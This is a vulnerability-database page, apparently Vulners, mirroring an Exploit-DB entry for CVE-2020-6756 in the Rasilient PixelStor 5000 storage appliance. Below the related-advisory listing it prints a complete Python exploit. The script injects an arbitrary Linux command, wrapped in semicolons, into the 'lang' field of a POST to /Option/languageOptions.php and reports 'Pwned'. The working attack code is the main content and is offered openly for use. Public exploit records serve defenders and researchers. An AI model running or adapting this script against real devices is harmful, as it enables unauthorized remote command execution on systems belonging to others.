Lucene search
K

PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution

🗓️ 10 Jan 2020 00:00:00Reported by .:UND3R:.Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 297 Views

PixelStor 5000 RCE exploit, K:4.0.1580-20150629 version allows remote code execution

Related
Code
ReporterTitlePublishedViews
Family
0day.today
PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution Exploit
11 Jan 202000:00
zdt
CNVD
Rasilient PixelStor 5000 Remote Code Execution Vulnerability
10 Jan 202000:00
cnvd
Check Point Advisories
Rasilient PixelStor Remote Code Execution (CVE-2020-6756)
11 Nov 202000:00
checkpoint_advisories
CVE
CVE-2020-6756
9 Jan 202022:10
cve
Cvelist
CVE-2020-6756
9 Jan 202022:10
cvelist
exploitpack
PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution
10 Jan 202000:00
exploitpack
NVD
CVE-2020-6756
9 Jan 202023:15
nvd
Packet Storm
PixelStor 5000 K:4.0.1580-20150629 Remote Code Execution
10 Jan 202000:00
packetstorm
Prion
Code injection
9 Jan 202023:15
prion
RedhatCVE
CVE-2020-6756
5 Feb 202514:39
redhatcve
Rows per page
# Exploit Title: PixelStor 5000 - Remote Code Execution
# Product: PixelStor 5000
# Vendor: Rasilient
# Date: 2020-01-08
# Exploit Author: .:UND3R:.
# Vendor Homepage: http://rasilient.com
# Version: K:4.0.1580-20150629 (KDI Version)
# Tested on: K:4.0.1580-20150629 (KDI Version)
# CVE: CVE-2020-6756
# URL Author: https://pwnedchile.com
# Thanks: Dani Pelotocino <3, Roit

import requests, sys

def poc(target, cmd):
	url = target + "/Option/languageOptions.php"
	headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
	data = {"lang": ";" + cmd + ";/bin/echo -n en"}
	r = requests.post(url, headers=headers, data=data)
	if(r.status_code == 200):
		print("\nPwned :]")
	else:
		print("\nNot vulnerable :(")

print("PixelStor 5000 RCE exploit\nVersion: K:4.0.1580-20150629 (KDI Version)\n\nAuthor: .:UND3R:.\nURL: https://pwnedchile.com\nThanks: Dani Pelotocino <3")

if len(sys.argv) !=2:
    print("\n[+] Usage: python " + sys.argv[0] + " <url>\n")
    sys.exit(1)

if __name__ == "__main__":
	url = sys.argv[1]
	cmd = raw_input("\n[Linux Command]:")
	poc(url, cmd)
#EoF

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Jan 2020 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 27.5
CVSS 3.19.8
CVSS 39.8
EPSS0.11831
297